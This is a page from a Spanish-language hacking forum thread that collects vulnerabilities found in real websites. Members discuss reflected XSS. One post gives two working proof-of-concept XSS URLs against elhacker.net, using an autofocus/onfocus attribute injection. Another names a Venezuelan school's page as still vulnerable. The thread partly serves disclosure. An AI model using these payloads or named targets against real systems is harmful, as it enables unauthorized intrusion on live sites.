elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: Deseas probar algunas mejoras a la interfaz del foro? Prueba cake! acerca de


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits
| | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | |-+  Recopilatorio de Vulnerabilidades de XSS/SQLinjection
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 2 3 4 5 [6] Ir Abajo Respuesta Imprimir
Autor Tema: Recopilatorio de Vulnerabilidades de XSS/SQLinjection  (Leído 60,412 veces)
engel lex
CoAdmin
***
Desconectado Desconectado

Mensajes: 11.497



Ver Perfil
Re: Recopilatorio de Vulnerabilidades de XSS/SQLinjection
« Respuesta #50 en: 12 Junio 2014, 08:42 »



PETROLERA MAS POPULAR EN PERU

BY Security : Peruano y Muy PICHULON  ;D
esto se puede tomar como una vulnerabilidad xss? no está haciendo nada, solo cometieron el error de no filtrar la búsqueda, pero no es como si pudieran hacer algo real con eso, ya que no es permanente
En línea

El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.
dRak0

Desconectado Desconectado

Mensajes: 234


Ver Perfil WWW
Re: Recopilatorio de Vulnerabilidades de XSS/SQLinjection
« Respuesta #51 en: 12 Junio 2014, 15:16 »

esto se puede tomar como una vulnerabilidad xss? no está haciendo nada, solo cometieron el error de no filtrar la búsqueda, pero no es como si pudieran hacer algo real con eso, ya que no es permanente

Es un XSS Reflejado. Requiere de ingenieria social para tomar provecho de esta falla.
En línea

Shell Root
Colaborador
***
Desconectado Desconectado

Mensajes: 3.829


Maestro del engaño!


Ver Perfil WWW
Re: Recopilatorio de Vulnerabilidades de XSS/SQLinjection
« Respuesta #52 en: 12 Junio 2014, 15:26 »

@engel lex, recuendo aquellos tiempos que me dedicaba a buscar vulnerabilidades por todos lados, y recuerdo más aún una frase que lei que dice: "Una vulnerabilidad es tan limitada como tu quieras que sea", y un XSS llega hasta donde tu la quieras llevar.
En línea

Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.
daryo


Desconectado Desconectado

Mensajes: 1.073



Ver Perfil WWW
Re: Recopilatorio de Vulnerabilidades de XSS/SQLinjection
« Respuesta #53 en: 12 Junio 2014, 15:33 »

Citar
"Una vulnerabilidad es tan limitada como tu quieras que sea"
si no me equivoco esa frase es de xc3ll/vengador de las sombras  :silbar:
En línea

arthusu

Desconectado Desconectado

Mensajes: 14


Ver Perfil
Re: Recopilatorio de Vulnerabilidades de XSS/SQLinjection
« Respuesta #54 en: 12 Junio 2014, 16:41 »

Sitio web: http://www.elhacker.net/
Descubridor: arthusu
URL del aviso: http://foro.elhacker.net/
Fecha de descubrimiento: 08/06/2014
Fecha de notificación: 10/06/2014
Fecha de publicación: 10/06/2014
Arreglado: --
Vulnerabilidad: XSS reflejado
Informacion adicional: Blog Personal

Código:
http://www.elhacker.net/geolocalizacion.html?host=google.com%22%20autofocus%20onfocus=%22alert%28%27arthusu%20was%20here%27%29%20/%3E


http://www.elhacker.net/whois.html?domain=187.233.84.51%22%20autofocus%20onfocus=%22alert%28%27arthusu%20was%20here%27%29
En línea

#!drvy
CoAdmin
***
Desconectado Desconectado

Mensajes: 4.546



Ver Perfil WWW
Re: Recopilatorio de Vulnerabilidades de XSS/SQLinjection
« Respuesta #55 en: 12 Junio 2014, 16:42 »

jaja buena esa arthusu =)

Saludos
En línea

Ceh

Desconectado Desconectado

Mensajes: 9


Ver Perfil
Re: Recopilatorio de Vulnerabilidades de XSS/SQLinjection
« Respuesta #56 en: 12 Junio 2014, 23:27 »

BROTHERS hermanos del UNDERGROUND como pueden ver esa web ya no tiene el xss reflejado ahora lo saco con la ayuda de mi addon de firerox ....... bueno y como que el tiro se hace mas dificil !

pero en el video hay scripts para juegar un buen rato :) saludos
En línea

Ceh

Desconectado Desconectado

Mensajes: 9


Ver Perfil
Re: Recopilatorio de Vulnerabilidades de XSS/SQLinjection
« Respuesta #57 en: 12 Junio 2014, 23:43 »

ACTUAL ------- ya no reflejado





 ;-) ;-) ;-) ;-) ;-) ;-) ;-) ;-) ;-)
« Última modificación: 12 Junio 2014, 23:47 por Ceh » En línea

LaraAnons

Desconectado Desconectado

Mensajes: 6


Hello World


Ver Perfil WWW
Re: Recopilatorio de Vulnerabilidades de XSS/SQLinjection
« Respuesta #58 en: 11 Septiembre 2015, 10:27 »

Sitio web: http://www.aeroescuela.com.ve
Descubridor: LaraAnons
URL del aviso: http://www.aeroescuela.com.ve/correos.php
Fecha de descubrimiento: 11/09/2015
Fecha de notificación: 11/09/2015
Fecha de publicación: 11/09/2015
Arreglado: No
Información adicional: Se informo al administrador a través de la sección contacto de su pagina web
Código:
http://www.aeroescuela.com.ve/librodevisitas.php
En línea

'El Arte de encontrar agujeros de seguridad no es mas que jugar a ser mas inteligente que el administrador'
By VenezuelanHackers
Páginas: 1 2 3 4 5 [6] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
como saltarse un maxlenght para SQLinjection...
Bugs y Exploits
tornar 7 3,505 Último mensaje 19 Abril 2006, 23:05
por Rentero
Como hacer update en SQLinjection
Nivel Web
BlackHKR 6 4,353 Último mensaje 12 Mayo 2010, 20:55
por BHK
Duda SQLinjection en information_schema « 1 2 »
Nivel Web
miguelskk 10 4,426 Último mensaje 17 Julio 2010, 01:46
por TapIt
AYUDA:Captura de paquetes con Wireshark para herramienta SQLinjection
Hacking Básico
NetStorm 1 1,846 Último mensaje 5 Octubre 2011, 00:06
por alpha015
SQLInjection sin acceso a information_schema
Nivel Web
buggy_man 3 1,723 Último mensaje 11 Agosto 2012, 07:17
por afdlkglfgfdgfhgf
Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines